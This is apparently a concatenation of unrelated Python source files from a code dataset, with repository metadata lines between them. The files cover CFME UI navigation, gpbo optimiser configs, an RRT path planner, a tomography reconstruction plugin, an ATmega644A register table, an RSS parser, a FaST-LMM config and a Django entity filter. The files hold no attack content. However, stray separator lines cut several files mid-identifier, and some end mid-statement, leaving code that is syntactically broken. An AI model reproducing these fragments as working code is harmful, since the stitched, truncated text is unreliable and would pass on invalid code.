view = self.create_view(SecurityGroupAllView)
view.flash.assert_success_message(flash_message)
view.entities.paginator.set_items_per_page(500)
sec_groups = self.instantiate(name, provider, description)
if wait:
wait_for(
lambda: sec_groups.name in view.entities.all_entity_names,
message="Wait Security Group to appear",
num_sec=400,
timeout=1000,
delay=20,
fail_func=sec_groups.refresh,
handle_exception=True
)
return sec_groups
# TODO: Delete collection as Delete option is not available on List view and update
@navigator.register(SecurityGroupCollection, 'All')
class SecurityGroupAll(CFMENavigateStep):
VIEW = SecurityGroupAllView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self, *args, **kwargs):
self.prerequisite_view.navigation.select('Networks', 'Security Groups')
@navigator.register(SecurityGroup, 'Details')
class Details(CFMENavigateStep):
VIEW = SecurityGroupDetailsView
prerequisite = NavigateToAttribute('parent', 'All')
def step(self, *args, **kwargs):
try:
self.prerequisite_view.entities.get_entity(name=self.obj.name, surf_pages=True).click()
except ItemNotFound:
raise SecurityGroupsNotFound("Security Groups {} not found".format(
self.obj.name))
@navigator.register(SecurityGroupCollection, 'Add')
class Add(CFMENavigateStep):
VIEW = SecurityGroupAddView
prerequisite = NavigateToSibling("All")
def step(self, *args, **kwargs):
"""Raises DropdownItemDisabled from widgetastic_patternfly
i
|
markm541374/gpbo
|
gpbo/core/config.py
|
Python
|
agpl-3.0
| 19,809 | 0.01575 |
import gpbo
xrange=range
from gpbo.core import GPdc as GPdc
import scipy as sp
class eimledefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIMAPaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'mprior': sp.array([1.]+[-1]*D),
'sprior': sp.array([2.]*(D+1)),
'kindex': GPdc.MAT52,
'maxf':500+100*D,
'overhead':None,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpmaprecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'smode':'direct',
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
import copy
class eifixdefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIFIXaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'hyper': sp.array([1.]+[0.5]*D),
'kindex': GPdc.MAT52,
'maxf':500+100*D,
'overhead':None,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 2000,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpfixrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'hyper':self.aqpara['hyper'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'smode':'direct',
'dpara':copy.deepcopy(self.aqpara['dpara']),
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eimlelearns():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIMAPaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'mprior': sp.array([1.]+[0.]*D+[-2]),
'sprior': sp.array([1.]*(D+1)+[5]),
'kindex': GPdc.SQUEXPCS,
'maxf':500+100*D,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpmaprecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eihypdefault(object):
def __init__(self,f,D,n,s,path,fname,nrandinit=10,kindex=GPdc.MAT52):
self.aqfn = gpbo.core.acquisitions.eihypaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': nrandinit,
#'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'kindex': kindex,
'DH_SAMPLES': 16+6*D,
'drop':True,
'noS': False,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':1000+200*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
|
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
|
self.fname = fname
return
class eihypgamma(eihypdefault):
def __init__(self,*args,**kwargs):
super(eihypgamma,self).__init__(*args,**kwargs)
D = len(self.aqpara['lb'])
self.reccpara['kindex']=self.aqpara['kindex']= GPdc.MAT52
self.reccpara['mprior']=self.aqpara['mprior']= sp.array([2.]+[3.]*D)
self.reccpara['sprior']=self.aqpara['sprior']= sp.array([0.5]+[0.15]*D)
self.reccpara['priorshape']=self.aqpara['priorshape']='gamma'
class pesfsdefault(object):
def __init__(self,f,D,n,s,path,fname,ninit=10):
self.aqfn = gpbo.core.acquisitions.PESfsaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': ninit,
#'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'priorshape' : 'lognorm',
'kindex': GPdc.MAT52,
'DH_SAMPLES': 16+6*D,
'weighted' : 0,
'DM_SAMPLES': 20+8*D,
'DM_SUPPORT': 750+250*D,
'SUPPORT_MODE': [gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA': 12+4.*D,
'drop':True,
'overhead':'none',
'noS': False,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['l
|
kth-ros-pkg/hfts_grasp_planner
|
src/hfts_grasp_planner/rrt.py
|
Python
|
bsd-3-clause
| 28,198 | 0.003511 |
#!/usr/bin/env python
""" This is a draft modification of the RRT algorithm for the sepcial case
that sampling the goal region is computationally expensive """
import random
import numpy
import time
import math
import logging
import copy
from rtree import index
class SampleData:
def __init__(self, config, data=None, data_copy_fn=copy.deepcopy, id_num=-1):
self._config = config
self._id = id_num
self._data = data
self._dataCopyFct = data_copy_fn
def get_configuration(self):
return self._config
def get_data(self):
return self._data
def copy(self):
copied_data = None
if self._data is not None:
copied_data = self._dataCopyFct(self._data)
return SampleData(numpy.copy(self._config), copied_data, data_copy_fn=self._dataCopyFct, id_num=self._id)
def is_valid(self):
return self._config is not None
def is_equal(self, other_sample_data):
return (self._config == other_sample_data._config).all() and self._data == other_sample_data._data
def get_id(self):
return self._id
def __repr__(self):
return self.__str__()
def __str__(self):
return "{SampleData:[Config=" + str(self._config) + "; Data=" + str(self._data) + "]}"
class TreeNode(object):
def __init__(self, nid, pid, data):
self._id = nid
self._parent = pid
self._data = data
self._children = []
def get_sample_data(self):
return self._data
def get_id(self):
return self._id
def get_parent_id(self):
return self._parent
def add_child_id(self, cid):
self._children.append(cid)
def get_children(self):
return self._children
def __str__(self):
return "{TreeNode: [id=" + str(self._id) + ", Data=" + str(self._data) + "]}"
class Tree(object):
TREE_ID = 0
def __init__(self, root_data, b_forward_tree=True):
self._nodes = [TreeNode(0, 0, root_data.copy())]
self._labeled_nodes = []
self._node_id = 1
self._b_forward_tree = b_forward_tree
self._tree_id = Tree.TREE_ID + 1
Tree.TREE_ID += 1
def add(self, parent, child_data):
"""
Adds the given data as a child node of parent.
@param parent: Must be of type TreeNode and denotes the parent node.
@param child_data: SampleData that is supposed to be saved in the child node (it is copied).
"""
child_node = TreeNode(self._node_id, parent.get_id(), child_data.copy())
parent.add_child_id(child_node.get_id())
self._nodes.append(child_node)
# self._parents.append(parent.get_id())
# assert(len(self._parents) == self._node_id + 1)
self._node_id += 1
return child_node
def get_id(self):
return self._tree_id
def add_labeled_node(self, node):
self._labeled_nodes.append(node)
def get_labeled_nodes(self):
return self._labeled_nodes
def clear_labeled_nodes(self):
self._labeled_nodes = []
def remove_labeled_node(self, node):
if node in self._labeled_nodes:
self._labeled_nodes.remove(node)
def nearest_neighbor(self, sample):
pass
def extract_path(self, goal_node):
path = [goal_node.get_sample_data()]
current_node = goal_node
while current_node.get_id() != 0:
current_node = self._nodes[current_node.get_parent_id()]
path.append(current_node.get_sample_data())
path.reverse()
return path
def get_root_node(self):
return self._nodes[0]
def size(self):
return len(self._nodes)
def merge(self, merge_node_a, other_tree, merge_node_b):
"""
Merges this tree with the given tree. The connection is established through nodeA and nodeB,
for which it is assumed that both nodeA and nodeB represent the same configuration.
In othe
|
r words, both the parent and all children of nodeB become children of nodeA.
Labeled nodes of tree B will be added as labeled nodes of tree A.
Runtime: O(size(otherTree) * num_labeled_nodes(otherTree))
@param merge_node_a The node of this tree where to attach otherTree
@param other_t
|
ree The other tree (is not changed)
@param merge_node_b The node of tree B that is merged with mergeNodeA from this tree.
@return The root of treeB as a TreeNode of treeA after the merge.
"""
node_stack = [(merge_node_a, merge_node_b, None)]
b_root_node_in_a = None
while len(node_stack) > 0:
(current_node_a, current_node_b, ignore_id) = node_stack.pop()
for child_id in current_node_b.get_children():
if child_id == ignore_id: # prevent adding duplicates
continue
child_node_b = other_tree._nodes[child_id]
child_node_a = self.add(current_node_a, child_node_b.get_sample_data())
if child_node_b in other_tree._labeled_nodes:
self.add_labeled_node(child_node_a)
node_stack.append((child_node_a, child_node_b, current_node_b.get_id()))
# In case current_node_b is not the root of B, we also need to add the parent
# as a child in this tree.
parent_id = current_node_b.get_parent_id()
if current_node_b.get_id() != parent_id:
if parent_id != ignore_id: # prevent adding duplicates
parent_node_b = other_tree._nodes[current_node_b.get_parent_id()]
child_node_a = self.add(current_node_a, parent_node_b.get_sample_data())
node_stack.append((child_node_a, parent_node_b, current_node_b.get_id()))
if parent_node_b in other_tree._labeled_nodes:
self.add_labeled_node(child_node_a)
else: # save the root to return it
b_root_node_in_a = current_node_a
return b_root_node_in_a
class SqrtTree(Tree):
def __init__(self, root):
super(SqrtTree, self).__init__(root)
self.offset = 0
def add(self, parent, child):
child_node = super(SqrtTree, self).add(parent, child)
self._update_stride()
return child_node
# def clear(self):
# super(SqrtTree, self).clear()
# self.offset = 0
# self.stride = 0
def nearest_neighbor(self, q):
"""
Computes an approximate nearest neighbor of q.
To keep the computation time low, this method only considers sqrt(n)
nodes, where n = #nodes.
This implementation is essentially a copy from:
http://ompl.kavrakilab.org/NearestNeighborsSqrtApprox_8h_source.html
@return The tree node (Type TreeNode) for which the data point is closest to q.
"""
d = float('inf')
nn = None
if self.stride > 0:
for i in range(0, self.stride):
pos = (i * self.stride + self.offset) % len(self._nodes)
n = self._nodes[pos]
dt = numpy.linalg.norm(q - n.get_sample_data().get_configuration())
if dt < d:
d = dt
nn = n
self.offset = random.randint(0, self.stride)
return nn
def _update_stride(self):
self.stride = int(1 + math.floor(math.sqrt(len(self._nodes))))
class RTreeTree(Tree):
def __init__(self, root, dimension, scaling_factors, b_forward_tree=True):
super(RTreeTree, self).__init__(root, b_forward_tree=b_forward_tree)
self._scaling_factors = scaling_factors
self._create_index(dimension)
self.dimension = dimension
self._add_to_idx(self._nodes[0])
def add(self, parent, child_data):
child_node = super(RTreeTree, self).add(parent, child_data)
self._add_to_idx(child_node)
return child_node
def nearest_neighbor(self, sample_data):
if len(self._nodes) == 0:
return None
|
swtp1v07/Savu
|
savu/plugins/scikitimage_filter_back_projection.py
|
Python
|
apache-2.0
| 3,515 | 0 |
import logging
from savu.plugins.base_recon import BaseRecon
from savu.data.process_data import CitationInfomration
from savu.plugins.cpu_plugin import CpuPlugin
import skimage.transform as transform
import numpy as np
from scipy import ndimage
class ScikitimageFilterBackProjection(BaseRecon, CpuPlugin):
"""
A Plugin to reconstruct an image by filter back projection
using the inverse radon transform from scikit-image.
:param output_size: Number of rows and columns in the
reconstruction. Default: None.
:param filter: Filter used in frequency domain filtering
Ramp filter used by default. Filters available: ramp, shepp-logan,
cosine, hamming, hann. Assign None to use no filter. Default: 'ramp'.
:param interpolation: interpolation method used in reconstruction.
Methods available: 'linear', 'nearest', and 'cubic' ('cubic' is slow).
Default: 'linear'.
:param circle: Assume the reconstructed image is zero outside the inscribed
circle. Also changes the default output_size to match the behaviour of
radon called with circle=True. Default: False.
"""
def __init__(self):
logging.debug("initialising Scikitimage Filter Back Projection")
logging.debug("Calling super to make sure that all superclasses are " +
" initialised")
super(ScikitimageFilterBackProjection,
self).__init__("ScikitimageFilterBackProjection")
def _shift(self, sinogram, centre_of_rotation):
centre_of_rotation_shift = (sinogram.shape[0]/2) - centre_of_rotation
return ndimage.interpolation.shift(sinogram,
centr
|
e_of_rotation_shift)
def reconstruct(self, sinogram, centre_of_rotation,
angles, shape, center):
print sinogram.shape
sinogram = np.swapaxes(sinogram, 0, 1)
sinogram = self._shift(sinogram, centre_of_rotation)
sino = np.nan_to_num(sinogram)
theta = np.linspace(0, 180, sinogram.shape[1])
result = \
transform.iradon(sino, theta=theta,
outpu
|
t_size=(sinogram.shape[0]),
# self.parameters['output_size'],
filter='ramp', # self.parameters['filter'],
interpolation='linear',
# self.parameters['linear'],
circle=False) # self.parameters[False])
return result
def get_citation_inforamtion(self):
cite_info = CitationInfomration()
cite_info.description = \
("The Tomographic reconstruction performed in this processing " +
"chain is derived from this work.")
cite_info.bibtex = \
("@book{avinash2001principles,\n" +
" title={Principles of computerized tomographic imaging},\n" +
" author={Kak, Avinash C. and Slaney, Malcolm},\n" +
" year={2001},\n" +
" publisher={Society for Industrial and Applied Mathematics}\n" +
"}")
cite_info.endnote = \
("%0 Book\n" +
"%T Principles of computerized tomographic imaging\n" +
"%A Kak, Avinash C.\n" +
"%A Slaney, Malcolm\n" +
"%@ 089871494X\n" +
"%D 2001\n" +
"%I Society for Industrial and Applied Mathematics")
cite_info.doi = "http://dx.doi.org/10.1137/1.9780898719277"
return cite_info
|
hickey/amforth
|
core/devices/atmega644a/device.py
|
Python
|
gpl-2.0
| 7,375 | 0.071458 |
# Partname: ATmega644A
# generated automatically, do not edit
MCUREGS = {
'ADCSRB': '&123',
'ADCSRB_ACME': '$40',
'ACSR': '&80',
'ACSR_ACD': '$80',
'ACSR_ACBG': '$40',
'ACSR_ACO': '$20',
'ACSR_ACI': '$10',
'ACSR_ACIE': '$08',
'ACSR_ACIC': '$04',
'ACSR_ACIS': '$03',
'DIDR1': '&127',
'DIDR1_AIN1D': '$02',
'DIDR1_AIN0D': '$01',
'UDR0': '&198',
'UCSR0A': '&192',
'UCSR0A_RXC0': '$80',
'UCSR0A_TXC0': '$40',
'UCSR0A_UDRE0': '$20',
'UCSR0A_FE0': '$10',
'UCSR0A_DOR0': '$08',
'UCSR0A_UPE0': '$04',
'UCSR0A_U2X0': '$02',
'UCSR0A_MPCM0': '$01',
'UCSR0B': '&193',
'UCSR0B_RXCIE0': '$80',
'UCSR0B_TXCIE0': '$40',
'UCSR0B_UDRIE0': '$20',
'UCSR0B_RXEN0': '$10',
'UCSR0B_TXEN0': '$08',
'UCSR0B_UCSZ02': '$04',
'UCSR0B_RXB80': '$02',
'UCSR0B_TXB80': '$01',
'UCSR0C': '&194',
'UCSR0C_UMSEL0': '$C0',
'UCSR0C_UPM0': '$30',
'UCSR0C_USBS0': '$08',
'UCSR0C_UCSZ0': '$06',
'UCSR0C_UCPOL0': '$01',
'UBRR0': '&196',
'PORTA': '&34',
'DDRA': '&33',
'PINA': '&32',
'PORTB': '&37',
'DDRB': '&36',
'PINB': '&35',
'PORTC': '&40',
'DDRC': '&39',
'PINC': '&38',
'PORTD': '&43',
'DDRD': '&42',
'PIND': '&41',
'OCR0B': '&72',
'OCR0A': '&71',
'TCNT0': '&70',
'TCCR0B': '&69',
'TCCR0B_FOC0A': '$80',
'TCCR0B_FOC0B': '$40',
'TCCR0B_WGM02': '$08',
'TCCR0B_CS0': '$07',
'TCCR0A': '&68',
'TCCR0A_COM0A': '$C0',
'TCCR0A_COM0B': '$30',
'TCCR0A_WGM0': '$03',
'TIMSK0': '&110',
'TIMSK0_OCIE0B': '$04',
'TIMSK0_OCIE0A': '$02',
'TIMSK0_TOIE0': '$01',
'TIFR0': '&53',
'TIFR0_OCF0B': '$04',
'TIFR0_OCF0A': '$02',
'TIFR0_TOV0': '$01',
'GTCCR': '&67',
'GTCCR_TSM': '$80',
'GTCCR_PSRSYNC': '$01',
'TIMSK2': '&112',
'TIMSK2_OCIE2B': '$04',
'TIMSK2_OCIE2A': '$02',
'TIMSK2_TOIE2': '$01',
'TIFR2': '&55',
'TIFR2_OCF2B': '$04',
'TIFR2_OCF2A': '$02',
'TIFR2_TOV2': '$01',
'TCCR2A': '&176',
'TCCR2A_COM2A': '$C0',
'TCCR2A_COM2B': '$30',
'TCCR2A_WGM2': '$03',
'TCCR2B': '&177',
'TCCR2B_FOC2A': '$80',
'TCCR2B_FOC2B': '$40',
'TCCR2B_WGM22': '$08',
'TCCR2B_CS2': '$07',
'TCNT2': '&178',
'OCR2B': '&180',
'OCR2A': '&179',
'ASSR': '&182',
'ASSR_EXCLK': '$40',
'ASSR_AS2': '$20',
'ASSR_TCN2UB': '$10',
'ASSR_OCR2AUB': '$08',
'ASSR_OCR2BUB': '$04',
'ASSR_TCR2AUB': '$02',
'ASSR_TCR2BUB': '$01',
'WDTCSR': '&96',
'WDTCSR_WDIF': '$80',
'WDTCSR_WDIE': '$40',
'WDTCSR_WDP': '$27',
'WDTCSR_WDCE': '$10',
'WDTCSR_WDE': '$08',
'OCDR': '&81',
'MCUCR': '&85',
'MCUCR_JTD': '$80',
'MCUSR': '&84',
'MCUSR_JTRF': '$10',
'SPMCSR': '&87',
'SPMCSR_SPMIE': '$80',
'SPMCSR_RWWSB': '$40',
'SPMCSR_SIGRD': '$20',
'SPMCSR_RWWSRE': '$10',
'SPMCSR_BLBSET': '$08',
'SPMCSR_PGWRT': '$04',
'SPMCSR_PGERS': '$02',
'SPMCSR_SPMEN': '$01',
'EICRA': '&105',
'EICRA_ISC2': '$30',
'EICRA_ISC1': '$0C',
'EICRA_ISC0': '$03',
'EIMSK': '&61',
'EIMSK_INT': '$07',
'EIFR': '&60',
'EIFR_INTF': '$07',
'PCMSK3': '&115',
'PCMSK3_PCINT': '$FF',
'PCMSK2': '&109',
'PCMSK2_PCINT': '$FF',
'PCMSK1': '&108',
'PCMSK1_PCINT': '$FF',
'PCMSK0': '&107',
'PCMSK0_PCINT': '$FF',
'PCIFR': '&59',
'PCIFR_PCIF': '$0F',
'PCICR': '&104',
'PCICR_PCIE': '$0F',
'ADMUX': '&124',
'ADMUX_REFS': '$C0',
'ADMUX_ADLAR': '$20',
'ADMUX_MUX': '$1F',
'ADC': '&120',
'ADCSRA': '&122',
'ADCSRA_ADEN': '$80',
'ADCSRA_ADSC': '$40',
'ADCSRA_ADATE': '$20',
'ADCSRA_ADIF': '$10',
'ADCSRA_ADIE': '$08',
'ADCSRA_ADPS': '$07',
'DIDR0': '&126',
'DIDR0_ADC7D': '$80',
'DIDR0_ADC6D': '$40',
'DIDR0_ADC5D': '$20',
'DIDR0_ADC4D': '$10',
'DIDR0_ADC3D': '$08',
'DIDR0_ADC2D': '$04',
'DIDR0_ADC1D': '$02',
'DIDR0_ADC0D': '$01',
'TIMSK1': '&111',
'TIMSK1_ICIE1': '$20',
'TIMSK1_OCIE1B': '$04',
'TIMSK1_OCIE1A': '$02',
'TIMSK1_TOIE1': '$01',
'TIFR1': '&54',
'TIFR1_ICF1': '$20',
'TIFR1_OCF1B': '$04',
'TIFR1_OCF1A': '$02',
'TIFR1_TOV1': '$01',
'TCCR1A': '&128',
'TCCR1A_COM1A': '$C0',
'TCCR1A_COM1B': '$30',
'TCCR1A_WGM1': '$03',
'TCCR1B': '&129',
'TCCR1B_ICNC1': '$80',
'TCCR1B_ICES1': '$40',
'TCCR1B_WGM1': '$18',
'TCCR1B_CS1': '$07',
'TCCR1C': '&130',
'TCCR1C_FOC1A': '$80',
'TCCR1C_FOC1B': '$40',
'TCNT1': '&132',
'OCR1A': '&136',
'OCR1B': '&138',
'ICR1': '&134',
'EEAR': '&65',
'EEDR': '&64',
'EECR': '&63',
'EECR_EEPM': '$30',
'EECR_EERIE': '$08',
'EECR_EEMPE': '$04',
'EECR_EEPE': '$02',
'EECR_EERE': '$01',
'TWAMR': '&189',
'TWAMR_TWAM': '$FE',
'TWBR': '&184',
'TWCR': '&188',
'TWCR_TWINT': '$80',
'TWCR_TWEA': '$40',
'TWCR_TWSTA': '$20',
'TWCR_TWSTO': '$10',
'TWCR_TWWC': '$08',
'TWCR_TWEN': '$04',
'TWCR_TWIE': '$01',
'TWSR': '&185',
'TWSR_TWS': '$F8',
'TWSR_TWPS': '$03',
'TWDR': '&187',
'TWAR': '&186',
'TWAR_TWA': '$FE',
'TWAR_TWGCE': '$01',
'UDR1': '&206',
'UCSR1A': '&200',
'UCSR1A_RXC1': '$80',
'UCSR1A_TXC1': '$40',
'UCSR1A_UDRE1': '$20',
'UCSR1A_FE1': '$10',
'UCSR1A_DOR1': '$08',
'UCSR1A_UPE1': '$04',
'UCSR1A_U2X1': '$02',
'UCSR1A_MPCM1': '$01',
'UCSR1B': '&201',
'UCSR1B_RXCIE1': '$80',
'UCSR1B_TXCIE1': '$40',
'UCSR1B_UDRIE1': '$20',
'UCSR1B_RXEN1': '$10',
'UCSR1B_TXEN1': '$08',
'UCSR1B_UCSZ12': '$04',
'UCSR1B_RXB81': '$02',
'UCSR1B_TXB81': '$01',
'UCSR1C': '&202',
'UCSR1C_UMSEL1': '$C0',
'UCSR1C_UPM1': '$30',
'UCSR1C_USBS1': '$08',
'UCSR1C_UCSZ1': '$06',
'UCSR1C_UCPOL1': '$01',
'UBRR1': '&204',
'SPDR': '&78',
'SPSR': '&77',
'SPSR_SPIF': '$80',
'SPSR_WCOL': '$40',
'SPSR_SPI2X': '$01',
'SPCR': '&76',
'SPCR_SPIE': '$80',
'SPCR_SPE': '$40',
'SPCR_DORD': '$20',
'SPCR_MSTR': '$10',
'SPCR_CPOL': '$08',
'SPCR_CPHA': '$04',
'SPCR_SPR': '$03',
'SREG': '&95',
'SREG_I': '$80',
'SREG_T': '$40',
'SREG_H': '$20',
'SREG_S': '$10',
'SREG_V': '$08',
'SREG_N': '$04',
'SREG_Z': '$02',
'SREG_C': '$01',
'SP': '&93',
'OSCCAL': '&102',
'CLKPR': '&97',
'CLKPR_CLKPCE': '$80',
'CLKPR_CLKPS': '$0F',
'SMCR': '&83',
'SMCR_SM': '$0E',
'SMCR_SE': '$01',
'GPIOR2': '&75',
'GPIOR2_GPIOR': '$FF',
'GPIOR1': '&74',
'GPIOR1_GPIOR': '$FF',
'GPIOR0': '&62',
'GPIOR0_GPIOR07': '$80',
'GPIOR0_GPIOR06': '$40',
'GPIOR0_GPIOR05': '$20',
'GPIOR0_GPIOR04': '$10',
'GPIOR0_GPIOR03': '$08',
'GPIOR0_GPIOR02': '$04',
'GPIOR0_GPIOR01': '$02',
'GPIOR0_GPIOR00': '$01',
'PRR0': '&100',
'PRR0_PRTWI': '$80',
'PRR0_PRTIM2': '$40',
'PRR0_PRTIM0':
|
'$20',
'PRR0_PRUSART': '$12',
'PRR0_PRTIM1': '
|
$08',
'PRR0_PRSPI': '$04',
'PRR0_PRADC': '$01',
'INT0Addr': '2',
'INT1Addr': '4',
'INT2Addr': '6',
'PCINT0Addr': '8',
'PCINT1Addr': '10',
'PCINT2Addr': '12',
'PCINT3Addr': '14',
'WDTAddr': '16',
'TIMER2_COMPAAddr': '18',
'TIMER2_COMPBAddr': '20',
'TIMER2_OVFAddr': '22',
'TIMER1_CAPTAddr': '24',
'TIMER1_COMPAAddr': '26',
'TIMER1_COMPBAddr': '28',
'TIMER1_OVFAddr': '30',
'TIMER0_COMPAAddr': '32',
'TIMER0_COMPBAddr': '34',
'TIMER0_OVFAddr': '36',
'SPI__STCAddr': '38',
'USART0__RXAddr': '40',
'USART0__UDREAddr': '42',
'USART0__TXAddr': '44',
'ANALOG_COMPAddr': '46',
'ADCAddr': '48',
'EE_READYAddr': '50',
'TWIAddr': '52',
'SPM_READYAddr': '54',
'USART1_RXAddr': '56',
'USART1_UDREAddr': '58',
'USART1_TXAddr': '60'
}
|
fake-name/ReadableWebProxy
|
WebMirror/management/rss_parser_funcs/feed_parse_extractWhatzombiesfearCom.py
|
Python
|
bsd-3-clause
| 551 | 0.034483 |
def extractW
|
hatzombiesfearCom(item):
'''
Parser for 'whatzombiesfear.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
|
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
MicrosoftGenomics/FaST-LMM
|
tests/inputs/buggy/lrt_one_kernel_mixed_effect_laplace_l2_logistic_qqfit.N30.py
|
Python
|
apache-2.0
| 956 | 0.041841 |
distributable = FastLmmSet(
phenofile = 'datasets/phenSynthFrom22.23.bin.N30.txt',
alt_snpreader = 'datasets/all_chr.maf0.001.N30',
altset_list = 'datasets/set_input.23_17_11.txt',
covarfile = None,
filenull = None,
autoselect = False,
mindist = 0,
idist=2,
nperm = 10,
test="lrt",
nullfit="qq", #use quantile-quantile fit to estimate params of null
|
distribution
outfile = 'tmp/lrt_one_kernel_mixed_effect_laplace_l2_logistic_qqfit.N30.txt',
forcefullrank=False,
qmax=0.1, #use the top 10% of null distrib test statistics to fit the null distribution
write_lrtperm=True,
datestamp=None,
nullModel={'effect':'mixed', 'link':'logistic',
|
'approx':'laplace', 'penalty':'l2'},
altModel={'effect':'mixed', 'link':'logistic',
'approx':'laplace', 'penalty':'l2'},
log = logging.CRITICAL,
detailed_table = False
)
|
uclouvain/osis
|
base/forms/entity.py
|
Python
|
agpl-3.0
| 2,540 | 0.001182 |
##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of
|
this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import django_filters
from d
|
jango.forms import TextInput
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers
from base.models.entity_version import EntityVersion
class EntityVersionFilter(django_filters.FilterSet):
acronym = django_filters.CharFilter(
lookup_expr='icontains', label=_("Acronym"),
widget=TextInput(attrs={'style': "text-transform:uppercase"})
)
title = django_filters.CharFilter(lookup_expr='icontains', label=_("Title"), )
class Meta:
model = EntityVersion
fields = ["entity_type"]
class EntityListSerializer(serializers.Serializer):
acronym = serializers.CharField()
title = serializers.CharField()
entity_type = serializers.CharField()
# Display human readable value
